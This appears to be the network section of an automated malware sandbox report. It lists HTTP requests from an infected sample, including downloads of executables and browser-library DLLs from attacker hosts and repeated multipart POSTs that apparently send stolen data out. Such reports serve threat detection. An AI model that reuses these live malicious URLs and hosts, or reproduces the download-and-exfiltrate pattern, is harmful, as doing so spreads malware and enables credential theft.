Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 6829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16221Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20443Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1280Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549452Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 90229Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cxltnyhuiiffpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wnghboslcyptbv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybixnwfxqnawnke.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nveksqhtkfjprim.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iaviihjfvlkssdeo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jshvqxnxlgx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qxjqslomabchbuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wihgequinwr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cuefhssjycse.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wdoppvcdtixmex.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gsjmasrkkjrldiqo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://srlstapgnwbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aygrwtlyeqtqcv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vottapluwptwea.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qpiqwcfhkuvh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bvudrrycsbfpyj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ugqjwtqplqxf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /osminogs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: m2reg.ulm.ac.id
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ehdswwmhlqrs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jdodcmixlyen.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qcnlqwjswwevflg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ykjudvyllkuyg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gyvrdnjxaaxg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://regrmottymepxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://moryykdrlgvjg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sbihfurweaaj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://klogjhrpharyvvyr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cjivmprmunnfue.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qtdootfwibyptmfp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://klmmidnilgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rvqmjyfxgsww.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xlmtuhrwkmvmisey.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lmdwelfmosoqccq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yxnwgxcirurq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mphdyxrkiaplq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oenbmxunqihumux.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lwhqeahmjeyw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com

Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.179.73

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

9_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199662282318 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/d/1Qqy-57DLmiipUvNEOUGrNV3pL-1VKzB_/view?usp=sharing HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.com
Source: global traffic	HTTP traffic detected: GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /osminogs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: m2reg.ulm.ac.id
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sajdfue.com

